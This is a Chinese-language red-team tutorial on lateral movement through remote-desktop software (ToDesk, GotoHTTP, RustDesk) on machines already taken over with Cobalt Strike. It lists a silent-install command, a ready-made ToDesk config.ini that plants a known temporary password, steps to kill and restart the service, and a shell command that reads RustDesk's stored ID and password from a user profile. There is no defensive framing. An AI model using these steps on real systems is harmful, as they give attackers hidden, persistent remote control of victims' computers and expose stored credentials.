利用遠控工具進行橫向移動

0x00   Todesk橫向移動

Todesk在安裝目錄下會生成一個config.ini配置文件，存儲的有設備代碼、臨時密碼、安全密碼以及登錄用戶和密碼等重要敏感信息，但密碼都經過Todesk特有的加密算法加密，所以不能通過解密得到明文密碼，只需要去替換這個配置文件，然后重啟服務即可。

利用過程

如果目標機器未安裝Todesk,可以將安裝包上傳至目標機器然后靜默安裝即可

todesk.exe /S

1、CS上線一臺機器后發現存在Todesk進程

2、找到Todesk的安裝目錄，替換為如下config.ini

// 臨時密碼為 063805
[ConfigInfo]
screen_img=
PrivateScreenLockScreen=1
autoLockScreen=1
language=936
Version=4.3.2.1
clientId=307085976
tempAuthPassEx=08f4314e069b5fd018daf1ce7fcba51d88e3fa3c97a396aa9157492455e28bb489142e39df3b5f6c2cb4782d1b7ecfb602f4b80a146c
updatePassTime=20220811
Resolution=2025x1363
TestHWCodecTime=20220811

3、殺掉Todesk相關進程

4、重啟Todesk

5、重啟之后，查看config.ini配置

查看后發現clientId值并沒有發現變化，但是tempAuthPassEx已經變成了我們替換后的臨時密碼

6、然后使用Todesk就可以直接遠程連接這臺機器了

0x01  GoToHTTP橫向移動

GotoHTTP工作在B2C模式。使用遠程控制時，您不必在每一臺電腦上都安裝遠程軟件。不管身處何處，有瀏覽器就能訪問遠程電腦。即使公司網絡管控，仍然可以控制或被控制。支持文件傳輸、無人值守、剪切板同步、遠程語 音、遠程攝像頭、多顯示器支持。

利用過程

1、將文件上傳到目標機器

2、運行程序

3、在程序的安裝目錄下查看配置文件里面有連接地址和賬號密碼

4、訪問配置文件中的地址，輸入遠程電腦ID及控制碼即可

0x02  RustDesk橫向移動

開箱即用，普通權限即可運行，而且支持純內網環境。

利用過程

1、將文件上傳到目標機器

2、運行

運行之后目標機器會彈出如下窗口，這個不用管，我們直接去找配置文件

3、查看配置文件，得到id和password

shell type C:\Users\Administrator\AppData\Roaming\RustDesk\config\RustDesk.toml

4、成功連接